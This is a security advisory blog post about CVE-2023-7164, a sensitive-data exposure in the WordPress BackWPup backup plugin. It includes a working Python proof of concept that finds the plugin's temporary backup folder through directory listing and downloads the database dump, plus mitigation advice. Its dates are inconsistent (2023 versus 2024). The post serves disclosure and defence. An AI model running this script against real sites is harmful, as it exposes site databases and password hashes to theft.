A critical vulnerability, CVE-2023-7164, has been uncovered in the popular WordPress plugin BackWPup, impacting over 600,000 active installations. This flaw exposes sensitive data and paves the way for potential account takeovers, posing a severe threat to website security.
Main info:

| Field | Value |
| --- | --- |
| CVE | CVE-2023-7164 |
| Plugin | BackWPup < 4.0.4 |
| Severity | Very High |
| All-time downloads | 13 960 177 |
| Active installations | 600 000+ |
| Publicly Published | March 17, 2023 |
| Last Updated | March 17, 2023 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A3: Sensitive Data Exposure |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7164, https://wpscan.com/vulnerability/79b07f37-2c6b-4846-bb28-91a1e5bf112e/ |
| Plugin Security Certification by CleanTalk | |
Timeline

| Date | Event |
| --- | --- |
| December 13, 2023 | Plugin testing and vulnerability detection in the BackWPup plugin were completed |
| December 13, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing it |
| March 17, 2024 | CVE-2023-7164 registered |
Discovery of the Vulnerability
During routine testing, security researchers identified a vulnerability in how the plugin handles its temporary directory, /wordpress/wp-content/uploads/backwpup-{hash}-temp, which is created inside the web-accessible uploads folder. This oversight exposes comprehensive details about the website's configuration, directories, and files, and grants unauthorized access to sensitive data stored in the database and in all associated files.
Understanding Sensitive Data Exposure attacks
Sensitive Data Exposure occurs when an attacker gains unauthorized access to confidential information, such as user credentials or system configurations. In the case of BackWPup, this vulnerability allows attackers to view and download backup files containing critical data, including database dumps, which facilitates account takeovers and compromises the entire system.
Exploiting the Sensitive Data Exposure Vulnerability
Exploiting this vulnerability involves either manually triggering a backup or waiting for the plugin's automatic backup to run. By accessing the backup directory, attackers can download sensitive files, including database dumps, and use them to launch further attacks, such as brute-force attacks on the password hashes they contain.
PoC:

1) The plugin has the ability to back up automatically, but for the speed of the PoC I will do it manually; this is similar to the automatic scanning.
2) There is a lot of sensitive data and, most importantly, you can download a backup file and save it to your local machine:
   "http://your_site/wordpress/wp-content/uploads/backwpup-{hash}-temp/wordpress_db.sql"
3) The exploit first accesses /wordpress/wp-content/uploads and parses the name of the backup folder with the hash, then waits for the backup to start and for a file with the database dump to appear. This vulnerability works because practically every WordPress site has directory listing enabled at /wordpress/wp-content/uploads, so the folder names can be viewed. Therefore, you should move this folder to wp-content or to any other folder that contains an index.php.
```python
import requests
import time
import threading
from bs4 import BeautifulSoup

base_url = "http://127.0.0.1/wordpress/wp-content/uploads/"
print(f"Checking directory listing at {base_url}")


def get_directory_listing(url):
    # Fetch the uploads folder; a 200 means directory listing is enabled.
    try:
        response = requests.get(url)
        if response.status_code == 200:
            return response.text
    except requests.RequestException as e:
        print(f"Error when requesting to {url}: {e}")
    return None


def check_url(url):
    # Poll the expected dump location until the backup run creates it.
    while True:
        try:
            response = requests.get(url)
            if response.status_code == 200:
                print(f"File at {url} found! I display the contents...")
                print(response.text)
        except requests.RequestException as e:
            print(f"Error when requesting to {url}: {e}")
        time.sleep(0.5)


listing_html = get_directory_listing(base_url)
if listing_html:
    soup = BeautifulSoup(listing_html, 'html.parser')
    target_folder = None
    for link in soup.find_all('a'):
        href = link.get('href') or ''  # <a> tags without href must not raise TypeError
        if 'backwpup' in href and 'temp' in href:
            target_folder = href.strip('/')  # listing hrefs usually carry a trailing slash
            break
    if target_folder:
        target_url = f"{base_url}{target_folder}/wordpress_db.sql"
        print(f"Checking the following URL for wordpress_db.sql: {target_url}")
        thread = threading.Thread(target=check_url, args=(target_url,))
        thread.start()
    else:
        print("Target folder not found in the directory listing.")
else:
    print("Error retrieving directory listing.")
```
___
The consequences of this vulnerability are dire, potentially leading to unauthorized access to sensitive data, website defacement, or even complete system compromise. Attackers could exploit this flaw to steal sensitive information, compromise user accounts, or deploy malware, posing significant risks to website owners and users.
Recommendations for Improved Security
To mitigate the risk posed by CVE-2023-7164, website administrators are strongly advised to update the BackWPup plugin to the latest version immediately. Additionally, securing the backup directory by restricting access or relocating it to a directory with an index.php file can prevent unauthorized access. Regular security audits and monitoring are also recommended to detect and mitigate vulnerabilities proactively.
By taking proactive measures to address Sensitive Data Exposure vulnerabilities like CVE-2023-7164, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
DMITRII I.